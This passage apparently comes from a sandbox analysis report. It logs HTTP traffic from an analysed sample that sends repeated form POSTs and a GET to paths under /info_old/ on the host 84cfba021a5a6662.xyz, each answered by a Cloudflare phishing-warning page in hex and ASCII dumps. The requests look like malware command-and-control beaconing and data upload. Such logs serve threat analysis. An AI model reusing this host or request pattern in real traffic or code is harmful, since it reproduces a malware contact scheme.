22 76 69 65 77 70 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:50:53.770232916 CET	143	OUT	POST /info_old/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 677 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:53.843482018 CET	145	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d45c6d300333a3627f8e13b7ded4f4da11611939053; expires=Sun, 28-Feb-21 16:50:53 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a718fe00001eb551389000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fSeqWiQutL1tvl78vt%2FfqJpQ%2FeQxCAlOWQJVBPuobyed3Sh7zdc8m2HVhYvxpfBBifpHgvIx7tdCXuQiowdQ12Bd7mh24nB76cIJdzdXRiNCENYclw%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 6194746e4d4f1eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:50:53.860074997 CET	150	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:53.954432964 CET	152	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d45c6d300333a3627f8e13b7ded4f4da11611939053; expires=Sun, 28-Feb-21 16:50:53 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a7196100001eb543991000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=T%2BHJluv3syMnxWeKBXm0CBFPFfqkbhUr38IjPf%2BnEkAYiW0KjnrH%2BU2Cq7rESF7QevUlZlwfLzu8I9BNMEOkLncpPq92tv44x0MCw0sRYPawAe8dfg%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 6194746edf121eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:50:54.578258038 CET	157	OUT	POST /info_old/g HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 1393 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:54.631290913 CET	164	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1d835011b2246c264bd0a92467baf3461611939054; expires=Sun, 28-Feb-21 16:50:54 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a71c1800001eb516179000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=w7PmcWcS7cGKwV%2FrpD0hT2ZPYh7h19lYSpXo89ApyQRqRIR19Os8qVEAzzYCmm3HhUOZeJ4QSbu148tcYGT7eSftx%2BH2j5KcDJpBq5U2ckdpfQbI9w%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619474735a1e1eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:50:54.654558897 CET	169	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:54.706629038 CET	170	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1d835011b2246c264bd0a92467baf3461611939054; expires=Sun, 28-Feb-21 16:50:54 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a71c6300001eb52f00e000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lM%2FpaJWmYYU71M1vqfk2duTBFJDLj0OCdWje%2BhbDX3qfcd1uaIy4B0fsypAm%2ByMvwyWmJac4FpywZWXBwNVz1qvfFMIaBtIcAAkOQXZWgC6g41oBoQ%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 61947473db401eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:50:54.709393978 CET	175	OUT	GET /info_old/r HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:50:54.759387970 CET	179	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:50:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d1d835011b2246c264bd0a92467baf3461611939054; expires=Sun, 28-Feb-21 16:50:54 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a71c9900001eb5252e9000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YxG3Mph7iewY4vVZxtsbLvaH1qZKRjP0epjGU%2BsP8KcRP9V%2FXFqSZHbqZktv6HJbAtPSGvKuy6TlVUTEI4UveGXtqDfwfGozMwhhIVRIjGnQZiJouA%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619474742c391eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:51:11.846930027 CET	576	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:51:11.897633076 CET	578	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:51:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d315786a8b707eeabf2c84590d68066161611939071; expires=Sun, 28-Feb-21 16:51:11 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f0a75f8b00001eb5448f6000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ER70wbd18n2rYR7fKKAidzdi3mLTZMQoa7uJ5N4vtWYSbb1PGhDgm%2B0XgUDk9%2FaQs1%2BWiyIRE6Bi6GAw5bBBI4mx0hXfUy2lf8DSqaJWLpJ5TldROA%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619474df4a161eb5-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 